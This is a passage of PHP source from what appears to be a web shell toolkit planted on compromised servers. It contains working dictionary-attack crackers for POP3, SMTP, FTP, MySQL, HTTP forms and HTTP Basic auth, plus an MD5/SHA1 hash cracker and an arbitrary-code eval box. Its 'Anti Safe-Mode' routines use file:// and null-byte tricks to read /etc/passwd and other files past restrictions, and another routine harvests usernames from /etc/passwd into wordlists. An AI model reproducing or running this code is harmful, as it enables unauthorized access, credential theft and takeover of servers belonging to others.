}else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
}
function pop3crackeR(){
global $t,$et,$errorbox,$crack;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$pop3=pop3logiN($target,$user,$pass);
if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}else echo "<center>${t}POP3 cracker:$crack";
}
function smtpcrackeR(){
global $t,$et,$errorbox,$crack;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$smtp=smtplogiN($target,$user,$pass,5);
if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}}
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}else echo "<center>${t}SMTP cracker:$crack";
}
function formcrackeR(){
global $errorbox,$footer,$et,$hcwd;
if(!empty($_REQUEST['start'])){
$url=$_REQUEST['target'];
$uf=$_REQUEST['userf'];
$pf=$_REQUEST['passf'];
$sf=$_REQUEST['submitf'];
$sv=$_REQUEST['submitv'];
$method=$_REQUEST['method'];
$fail=$_REQUEST['fail'];
$dic=$_REQUEST['dictionary'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
$dictionary=fopen($dic,'r');
echo "<font color=blue>Cracking started...<br>";
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$url.="?$uf=$user&$pf=$pass&$sf=$sv";
$res=check_urL($url,$method,$fail,12);
if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
flusheR();
}
fclose($dictionary);
echo "Done!</font><br>";
}
else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
}
function hashcrackeR(){
global $errorbox,$t,$et,$hcwd;
if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
$hash=strtoupper($_REQUEST['hash']);
echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
while(!feof($dictionary)){
$word=trim(fgets($dictionary)," \n\r");
if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
}
echo "Done!</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}
echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
}
function pr0xy(){
global $errorbox,$et,$footer,$hcwd;
echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
if (!empty($_REQUEST['urL'])){
$dir="";
$u=parse_url($_REQUEST['urL']);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
$url=@fsockopen($host, 80, $errno, $errstr, 12);
if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
while(!feof($url)){
$con = fgets($url);
$con = str_replace("href=mailto","HrEf=mailto",$con);
$con = str_replace("HREF=mailto","HrEf=mailto",$con);
$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
echo $con;
}
fclose($url);
}
}
function mysqlclienT(){
global $t,$errorbox,$et,$hcwd;
if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB'];
$link = @mysql_connect($server,$user,$pass);
if($link){
if (!empty($db))mysql_select_db($db);
$result=mysql_query($query,$link);
echo "${t}Query result(s):$et";
echo "<font color=blue><pre>";
while($data=mysql_fetch_row($result)){
foreach($data as $v) {
echo $v;
echo "\t";
}
echo "\n";
}
echo "</pre></font>";
mysql_close($link);
}
else{
echo "$errorbox Login failed!$et<br>";
}
}
echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>";
}
function phpevaL(){
global $t,$hcwd;
if (!empty($_REQUEST['code'])){
echo "<center><textarea rows=\"10\" cols=\"64\">";
$code = str_replace("<?php","",$_REQUEST['code']);
$code = str_replace("<?","",$code);
$code = str_replace("?>","",$code);
htmlspecialchars(eval($code));
echo "</textarea></center><br>";
}
echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>";
}
function whoiS(){
global $t,$hcwd;
if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
$server =$_REQUEST['server'];
$domain=$_REQUEST['domain']."\r\n";
$ser=fsockopen($server,43,$en,$es,5);
fputs($ser,$domain);
echo "<pre>";
while(!feof($ser))echo fgets($ser);
echo "</pre>";
fclose($ser);
}
else{
echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
}
}
function hexvieW(){
if (!empty($_REQUEST['filE'])){
$f = $_REQUEST['filE'];
echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>";
$file = fopen($f,"r");
$i= -1;
while (!feof($file)) {
$ln='';
$i++;
echo "<tr><td width=\"10%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080";
echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>";
echo "<td width=\"25%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080"; 
echo "\">";
for ($j=0;$j<=7;$j++){
if (!feof($file)){
$tmp = strtoupper(dechex(ord(fgetc($file))));
if (strlen($tmp)==1) $tmp = "0".$tmp;
echo $tmp." ";
$ln.=$tmp;
}
}
echo "</td><td width=\"25%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080"; 
echo "\">";
for ($j=7;$j<=14;$j++){
if (!feof($file)){
$tmp = strtoupper(dechex(ord(fgetc($file))));
if (strlen($tmp)==1) $tmp = "0".$tmp;
echo $tmp." ";
$ln.=$tmp;
}
}
echo "</td><td width=\"40%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080";
echo "\">";
$n=0;$asc="";$co=0;
for ($k=0;$k<=16;$k++){
$co=hexdec(substr($ln,$n,2));
if (($co<=31)||(($co>=127)&&($co<=160)))$co=46;
$asc.= chr($co);
$n+=2;
}
echo htmlspecialchars($asc);
echo "</td></tr>";
}
}
fclose($file);
echo "</table>";
}
function safemodE(){
global $windows,$t,$hcwd;
if (!empty($_REQUEST['file'])){
$i=1;
echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n";
ini_restore("safe_mode");ini_restore("open_basedir");
$tmp = file_get_contents($_REQUEST['file']);
echo $tmp;
$i++;
echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n";
$tmp=tempnam("","cx");
copy("compress.zlib://".$_REQUEST['file'], $tmp);
$fh = fopen($tmp, "r");
$data = fread($fh, filesize($tmp));
fclose($fh);
echo $data;
$i++;
if(function_exists("curl_init")){
echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n";
$fh = @curl_init("file://".$_REQUEST['file']."");
$tmp = @curl_exec($fh);
echo $tmp;
$i++;
echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n";
$i++;
if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
}
if($_REQUEST['file'] == "/etc/passwd"){
echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n";
for($uid=0;$uid<99999;$uid++){
$h=posix_getpwuid($uid);
if (!empty($h))foreach($h as $v)echo "$v:";}}
$i++;
echo "</pre></font>";
}
echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>";
}
function crackeR(){
global $et;
$cwd = getcwd();
echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>";
}
function dicmakeR(){
global $errorbox,$windows,$footer,$t,$et,$hcwd;
if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
$min = $_REQUEST['min'];
$max = $_REQUEST['max'];
if($max<$min)die($errorbox ."Bad input!$et". $footer);
$s =$w="";
$out = $_REQUEST['output'];
$r = ($_REQUEST['range']=='a' )?'a':'A';
if ($_REQUEST['range']==0) $r=0;
for($i=0;$i<$min;$i++) $s.=$r;
$dic = fopen($out,'a');
if(is_nan($r)){
while(strlen($s)<=$max){
$w = $s;
if($combo)$w="$w:$w";
fwrite($dic,$w."\n");
$s++;}
}
else{
while(strlen($w)<=$max){
$w =(string)str_repeat("0",($min - strlen($s))).$s;
if($combo)$w="$w:$w";
fwrite($dic,$w."\n");
$s++;}
}
fclose($dic);
echo "<font color=blue>Done</font>";
}
if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
$input=fopen($_REQUEST['input'],'r');
if (!$input){
if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
else{
$input=explode("\n",shelL("cat $input"));
$output=fopen($_REQUEST['output'],'w');
if ($output){
foreach ($input as $in){
$user = $in;
$user = trim(fgets($in)," \n\r");
if (!strstr($user,":"))continue;
$user=substr($user,0,(strpos($user,':')));
if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
}
fclose($input);fclose($output);
echo "<font color=blue>Done</font>";
}
}
}
else{
$output=fopen($_REQUEST['output'],'w');
if ($output){
while (!feof($input)){
$user = trim(fgets($input)," \n\r");
if (!strstr($user,":"))continue;
$user=substr($user,0,(strpos($user,':')));
if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
}
fclose($input);fclose($output);
echo "<font color=blue>Done</font>";
}
else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
}
}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
if($combo && $res){
$file=file($_REQUEST['output']);
$output=fopen($_REQUEST['output'],'w');
foreach ($file as $v)fwrite($output,"$v:$v\n");
fclose($output);
}
echo "<font color=blue>Done</font>";
}else{
$temp=whereistmP();
echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";}
}
function calC(){
global $t,$et,$hcwd;
$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode');
if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">";
if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i})));
echo "</textarea>$et</center><br>";
}
echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>";
}
function authcrackeR(){
global $errorbox,$et,$t,$crack,$hcwd;
if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$data='';
$method=($_REQUEST['method'])?'POST':'GET';
if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
spliturL($_REQUEST['target'],$host,$page);
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
if($method='GET')$page.=$data;
$dictionary=fopen($_REQUEST['dictionary'],'r');
echo "<font color=blue>";
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$so=fsockopen($host,80,$en,$es,5);
if(!$so){echo "$errorbox Can not connect to host$et";break;}
else{
$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
$packet.="\r\n\r\n";
$packet.=$data;
fputs($so,$packet);
$res=substr(fgets($so),9,2);
fclose($so);
if($res=='20')echo "U: $user P: $pass</br>";
flusheR();
}
}
echo "Done!</font>";
}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
}
function sqlcrackeR(){
global $errorbox,$t,$et,$crack;
if (!function_exists("mysql_connect")){
echo "$errorbox Server does n`t support MySQL$et";
}
else{
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$sql=@mysql_connect($target,$user,$pass);
if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;}
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}
else{
echo "<center>${t}MySQL cracker:$crack";
}
}
}
function ftpcrackeR(){
global $errorbox,$t,$et,$crack;
if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
else{
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
